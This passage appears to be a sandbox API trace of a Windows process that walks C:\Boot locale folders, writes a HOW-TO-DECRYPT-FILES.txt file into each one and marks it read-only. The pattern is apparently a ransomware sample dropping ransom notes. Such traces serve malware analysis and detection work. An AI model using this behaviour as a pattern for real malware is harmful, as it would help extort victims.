GetLastError () returned 0x0 [0045.053] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0045.054] GetLastError () returned 0x0 [0045.054] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0045.054] GetLastError () returned 0x0 [0045.054] GetFullPathNameW (in: lpFileName="C:\\Boot\\sv-SE", nBufferLength=0x105, lpBuffer=0x18e944, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\sv-SE", lpFilePart=0x0) returned 0xd [0045.054] GetLastError () returned 0x0 [0045.054] SetErrorMode (uMode=0x1) returned 0x0 [0045.054] FindFirstFileW (in: lpFileName="C:\\Boot\\sv-SE\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3609e0 [0045.054] GetLastError () returned 0x0 [0045.054] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.054] GetLastError () returned 0x0 [0045.054] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.054] GetLastError () returned 0x0 [0045.054] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0045.054] GetLastError () returned 0x12 [0045.054] FindClose (in: hFindFile=0x3609e0 | out: hFindFile=0x3609e0) returned 1 [0045.054] SetErrorMode (uMode=0x0) returned 0x1 [0045.054] GetFullPathNameW (in: lpFileName="C:\\Boot\\sv-SE", nBufferLength=0x105, lpBuffer=0x18e944, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\sv-SE", lpFilePart=0x0) returned 0xd [0045.054] GetLastError () returned 0x12 [0045.054] SetErrorMode (uMode=0x1) returned 0x0 [0045.054] FindFirstFileW (in: lpFileName="C:\\Boot\\sv-SE\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3609e0 [0045.054] GetLastError () returned 0x12 [0045.054] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.054] GetLastError () returned 0x12 [0045.054] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.054] GetLastError () returned 0x12 [0045.054] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0045.054] GetLastError () returned 0x12 [0045.054] FindClose (in: hFindFile=0x3609e0 | out: hFindFile=0x3609e0) returned 1 [0045.054] SetErrorMode (uMode=0x0) returned 0x1 [0045.055] GetFullPathNameW (in: lpFileName="C:\\Boot\\sv-SE\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x18e9f8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\sv-SE\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0045.055] GetLastError () returned 0x12 [0045.055] SetErrorMode (uMode=0x1) returned 0x0 [0045.055] GetFileAttributesExW (in: lpFileName="C:\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x1b8a740 | out: lpFileInformation=0x1b8a740*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x553a5740, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8c1e060, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640)) returned 1 [0045.055] GetLastError () returned 0x12 [0045.055] SetErrorMode (uMode=0x0) returned 0x1 [0045.055] GetFullPathNameW (in: lpFileName="C:\\Boot\\sv-SE\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\sv-SE\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x26 [0045.055] GetLastError () returned 0x12 [0045.055] SetErrorMode (uMode=0x1) returned 0x0 [0045.055] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\boot\\sv-se\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0045.055] GetLastError () returned 0x0 [0045.055] GetFileType (hFile=0x184) returned 0x1 [0045.055] SetErrorMode (uMode=0x0) returned 0x1 [0045.055] GetFileType (hFile=0x184) returned 0x1 [0045.055] WriteFile (in: hFile=0x184, lpBuffer=0x1ba65d8*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ee04, lpOverlapped=0x0 | out: lpBuffer=0x1ba65d8*, lpNumberOfBytesWritten=0x18ee04*=0x18da, lpOverlapped=0x0) returned 1 [0045.056] GetLastError () returned 0x0 [0045.056] CloseHandle (hObject=0x184) returned 1 [0045.056] GetLastError () returned 0x0 [0045.056] GetFullPathNameW (in: lpFileName="C:\\Boot\\sv-SE\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e9cc, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\sv-SE\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x26 [0045.056] GetLastError () returned 0x0 [0045.056] SetFileAttributesW (lpFileName="C:\\Boot\\sv-SE\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0045.057] GetLastError () returned 0x0 [0045.057] GetFullPathNameW (in: lpFileName="C:\\Boot\\tr-TR", nBufferLength=0x105, lpBuffer=0x18ea6c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\tr-TR", lpFilePart=0x0) returned 0xd [0045.057] GetLastError () returned 0x0 [0045.057] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0045.057] GetLastError () returned 0x0 [0045.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0045.057] GetLastError () returned 0x0 [0045.057] GetFullPathNameW (in: lpFileName="C:\\Boot\\tr-TR", nBufferLength=0x105, lpBuffer=0x18e944, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\tr-TR", lpFilePart=0x0) returned 0xd [0045.057] GetLastError () returned 0x0 [0045.057] SetErrorMode (uMode=0x1) returned 0x0 [0045.057] FindFirstFileW (in: lpFileName="C:\\Boot\\tr-TR\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3609e0 [0045.057] GetLastError () returned 0x0 [0045.057] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.057] GetLastError () returned 0x0 [0045.057] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.057] GetLastError () returned 0x0 [0045.057] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0045.058] GetLastError () returned 0x12 [0045.058] FindClose (in: hFindFile=0x3609e0 | out: hFindFile=0x3609e0) returned 1 [0045.058] SetErrorMode (uMode=0x0) returned 0x1 [0045.058] GetFullPathNameW (in: lpFileName="C:\\Boot\\tr-TR", nBufferLength=0x105, lpBuffer=0x18e944, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\tr-TR", lpFilePart=0x0) returned 0xd [0045.058] GetLastError () returned 0x12 [0045.058] SetErrorMode (uMode=0x1) returned 0x0 [0045.058] FindFirstFileW (in: lpFileName="C:\\Boot\\tr-TR\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3609e0 [0045.058] GetLastError () returned 0x12 [0045.058] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.058] GetLastError () returned 0x12 [0045.058] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.058] GetLastError () returned 0x12 [0045.058] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0045.058] GetLastError () returned 0x12 [0045.058] FindClose (in: hFindFile=0x3609e0 | out: hFindFile=0x3609e0) returned 1 [0045.058] SetErrorMode (uMode=0x0) returned 0x1 [0045.058] GetFullPathNameW (in: lpFileName="C:\\Boot\\tr-TR\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x18e9f8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\tr-TR\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0045.058] GetLastError () returned 0x12 [0045.058] SetErrorMode (uMode=0x1) returned 0x0 [0045.058] GetFileAttributesExW (in: lpFileName="C:\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x1ba92e0 | out: lpFileInformation=0x1ba92e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x553a5740, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8c1e060, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440)) returned 1 [0045.059] GetLastError () returned 0x12 [0045.059] SetErrorMode (uMode=0x0) returned 0x1 [0045.059] GetFullPathNameW (in: lpFileName="C:\\Boot\\tr-TR\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\tr-TR\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x26 [0045.059] GetLastError () returned 0x12 [0045.059] SetErrorMode (uMode=0x1) returned 0x0 [0045.059] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\boot\\tr-tr\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0045.059] GetLastError () returned 0x0 [0045.059] GetFileType (hFile=0x184) returned 0x1 [0045.059] SetErrorMode (uMode=0x0) returned 0x1 [0045.059] GetFileType (hFile=0x184) returned 0x1 [0045.059] WriteFile (in: hFile=0x184, lpBuffer=0x1bc506c*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ee04, lpOverlapped=0x0 | out: lpBuffer=0x1bc506c*, lpNumberOfBytesWritten=0x18ee04*=0x18da, lpOverlapped=0x0) returned 1 [0045.060] GetLastError () returned 0x0 [0045.060] CloseHandle (hObject=0x184) returned 1 [0045.060] GetLastError () returned 0x0 [0045.060] GetFullPathNameW (in: lpFileName="C:\\Boot\\tr-TR\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e9cc, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\tr-TR\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x26 [0045.060] GetLastError () returned 0x0 [0045.060] SetFileAttributesW (lpFileName="C:\\Boot\\tr-TR\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0045.060] GetLastError () returned 0x0 [0045.061] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-CN", nBufferLength=0x105, lpBuffer=0x18ea6c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-CN", lpFilePart=0x0) returned 0xd [0045.061] GetLastError () returned 0x0 [0045.061] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0045.061] GetLastError () returned 0x0 [0045.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0045.061] GetLastError () returned 0x0 [0045.061] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-CN", nBufferLength=0x105, lpBuffer=0x18e944, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-CN", lpFilePart=0x0) returned 0xd [0045.061] GetLastError () returned 0x0 [0045.061] SetErrorMode (uMode=0x1) returned 0x0 [0045.061] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-CN\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3609e0 [0045.061] GetLastError () returned 0x0 [0045.061] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.061] GetLastError () returned 0x0 [0045.061] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.061] GetLastError () returned 0x0 [0045.061] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0045.061] GetLastError () returned 0x12 [0045.061] FindClose (in: hFindFile=0x3609e0 | out: hFindFile=0x3609e0) returned 1 [0045.061] SetErrorMode (uMode=0x0) returned 0x1 [0045.061] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-CN", nBufferLength=0x105, lpBuffer=0x18e944, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-CN", lpFilePart=0x0) returned 0xd [0045.061] GetLastError () returned 0x12 [0045.061] SetErrorMode (uMode=0x1) returned 0x0 [0045.061] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-CN\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3609e0 [0045.061] GetLastError () returned 0x12 [0045.061] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.061] GetLastError () returned 0x12 [0045.061] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.061] GetLastError () returned 0x12 [0045.061] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0045.061] GetLastError () returned 0x12 [0045.061] FindClose (in: hFindFile=0x3609e0 | out: hFindFile=0x3609e0) returned 1 [0045.062] SetErrorMode (uMode=0x0) returned 0x1 [0045.062] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-CN\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x18e9f8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-CN\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0045.062] GetLastError () returned 0x12 [0045.062] SetErrorMode (uMode=0x1) returned 0x0 [0045.062] GetFileAttributesExW (in: lpFileName="C:\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x1bc7d74 | out: lpFileInformation=0x1bc7d74*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x553cb8a0, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8c441c0, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440)) returned 1 [0045.062] GetLastError () returned 0x12 [0045.062] SetErrorMode (uMode=0x0) returned 0x1 [0045.062] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-CN\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-CN\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x26 [0045.062] GetLastError () returned 0x12 [0045.062] SetErrorMode (uMode=0x1) returned 0x0 [0045.062] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\boot\\zh-cn\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0045.062] GetLastError () returned 0x0 [0045.062] GetFileType (hFile=0x184) returned 0x1 [0045.062] SetErrorMode (uMode=0x0) returned 0x1 [0045.062] GetFileType (hFile=0x184) returned 0x1 [0045.062] WriteFile (in: hFile=0x184, lpBuffer=0x1be3b00*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ee04, lpOverlapped=0x0 | out: lpBuffer=0x1be3b00*, lpNumberOfBytesWritten=0x18ee04*=0x18da, lpOverlapped=0x0) returned 1 [0045.063] GetLastError () returned 0x0 [0045.063] CloseHandle (hObject=0x184) returned 1 [0045.063] GetLastError () returned 0x0 [0045.063] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-CN\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e9cc, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-CN\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x26 [0045.063] GetLastError () returned 0x0 [0045.063] SetFileAttributesW (lpFileName="C:\\Boot\\zh-CN\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0045.064] GetLastError () returned 0x0 [0045.064] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-HK", nBufferLength=0x105, lpBuffer=0x18ea6c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-HK", lpFilePart=0x0) returned 0xd [0045.064] GetLastError () returned 0x0 [0045.064] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0045.064] GetLastError () returned 0x0 [0045.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0045.064] GetLastError () returned 0x0 [0045.064] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-HK", nBufferLength=0x105, lpBuffer=0x18e944, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-HK", lpFilePart=0x0) returned 0xd [0045.064] GetLastError () returned 0x0 [0045.064] SetErrorMode (uMode=0x1) returned 0x0 [0045.064] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-HK\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3609e0 [0045.064] GetLastError () returned 0x0 [0045.064] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.065] GetLastError () returned 0x0 [0045.065] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.065] GetLastError () returned 0x0 [0045.065] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0045.065] GetLastError () returned 0x12 [0045.065] FindClose (in: hFindFile=0x3609e0 | out: hFindFile=0x3609e0) returned 1 [0045.065] SetErrorMode (uMode=0x0) returned 0x1 [0045.065] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-HK", nBufferLength=0x105, lpBuffer=0x18e944, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-HK", lpFilePart=0x0) returned 0xd [0045.065] GetLastError () returned 0x12 [0045.065] SetErrorMode (uMode=0x1) returned 0x0 [0045.065] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-HK\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3609e0 [0045.065] GetLastError () returned 0x12 [0045.065] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.065] GetLastError () returned 0x12 [0045.065] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.065] GetLastError () returned 0x12 [0045.065] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0045.065] GetLastError () returned 0x12 [0045.065] FindClose (in: hFindFile=0x3609e0 | out: hFindFile=0x3609e0) returned 1 [0045.065] SetErrorMode (uMode=0x0) returned 0x1 [0045.065] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-HK\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x18e9f8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-HK\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0045.065] GetLastError () returned 0x12 [0045.065] SetErrorMode (uMode=0x1) returned 0x0 [0045.065] GetFileAttributesExW (in: lpFileName="C:\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x1be6808 | out: lpFileInformation=0x1be6808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x553cb8a0, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8c441c0, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250)) returned 1 [0045.066] GetLastError () returned 0x12 [0045.066] SetErrorMode (uMode=0x0) returned 0x1 [0045.066] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-HK\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-HK\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x26 [0045.066] GetLastError () returned 0x12 [0045.066] SetErrorMode (uMode=0x1) returned 0x0 [0045.066] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\boot\\zh-hk\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0045.066] GetLastError () returned 0x0 [0045.066] GetFileType (hFile=0x184) returned 0x1 [0045.066] SetErrorMode (uMode=0x0) returned 0x1 [0045.066] GetFileType (hFile=0x184) returned 0x1 [0045.066] WriteFile (in: hFile=0x184, lpBuffer=0x1c02594*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ee04, lpOverlapped=0x0 | out: lpBuffer=0x1c02594*, lpNumberOfBytesWritten=0x18ee04*=0x18da, lpOverlapped=0x0) returned 1 [0045.067] GetLastError () returned 0x0 [0045.067] CloseHandle (hObject=0x184) returned 1 [0045.067] GetLastError () returned 0x0 [0045.067] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-HK\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e9cc, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-HK\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x26 [0045.067] GetLastError () returned 0x0 [0045.067] SetFileAttributesW (lpFileName="C:\\Boot\\zh-HK\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0045.068] GetLastError () returned 0x0 [0045.068] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-TW", nBufferLength=0x105, lpBuffer=0x18ea6c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-TW", lpFilePart=0x0) returned 0xd [0045.068] GetLastError () returned 0x0 [0045.068] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0045.068] GetLastError () returned 0x0 [0045.068] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0045.068] GetLastError () returned 0x0 [0045.068] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-TW", nBufferLength=0x105, lpBuffer=0x18e944, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-TW", lpFilePart=0x0) returned 0xd [0045.068] GetLastError () returned 0x0 [0045.068] SetErrorMode (uMode=0x1) returned 0x0 [0045.068] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-TW\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3609e0 [0045.068] GetLastError () returned 0x0 [0045.068] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.068] GetLastError () returned 0x0 [0045.068] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.068] GetLastError () returned 0x0 [0045.068] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0045.068] GetLastError () returned 0x12 [0045.068] FindClose (in: hFindFile=0x3609e0 | out: hFindFile=0x3609e0) returned 1 [0045.068] SetErrorMode (uMode=0x0) returned 0x1 [0045.068] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-TW", nBufferLength=0x105, lpBuffer=0x18e944, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-TW", lpFilePart=0x0) returned 0xd [0045.068] GetLastError () returned 0x12 [0045.068] SetErrorMode (uMode=0x1) returned 0x0 [0045.068] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-TW\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3609e0 [0045.068] GetLastError () returned 0x12 [0045.068] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.068] GetLastError () returned 0x12 [0045.068] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.068] GetLastError () returned 0x12 [0045.068] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0045.069] GetLastError () returned 0x12 [0045.069] FindClose (in: hFindFile=0x3609e0 | out: hFindFile=0x3609e0) returned 1 [0045.069] SetErrorMode (uMode=0x0) returned 0x1 [0045.069] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-TW\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x18e9f8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-TW\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0045.069] GetLastError () returned 0x12 [0045.069] SetErrorMode (uMode=0x1) returned 0x0 [0045.069] GetFileAttributesExW (in: lpFileName="C:\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x1c0529c | out: lpFileInformation=0x1c0529c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x553cb8a0, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8c441c0, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240)) returned 1 [0045.069] GetLastError () returned 0x12 [0045.069] SetErrorMode (uMode=0x0) returned 0x1 [0045.069] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-TW\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-TW\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x26 [0045.069] GetLastError () returned 0x12 [0045.069] SetErrorMode (uMode=0x1) returned 0x0 [0045.069] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\boot\\zh-tw\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0045.069] GetLastError () returned 0x0 [0045.069] GetFileType (hFile=0x184) returned 0x1 [0045.069] SetErrorMode (uMode=0x0) returned 0x1 [0045.069] GetFileType (hFile=0x184) returned 0x1 [0045.069] WriteFile (in: hFile=0x184, lpBuffer=0x1c21028*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ee04, lpOverlapped=0x0 | out: 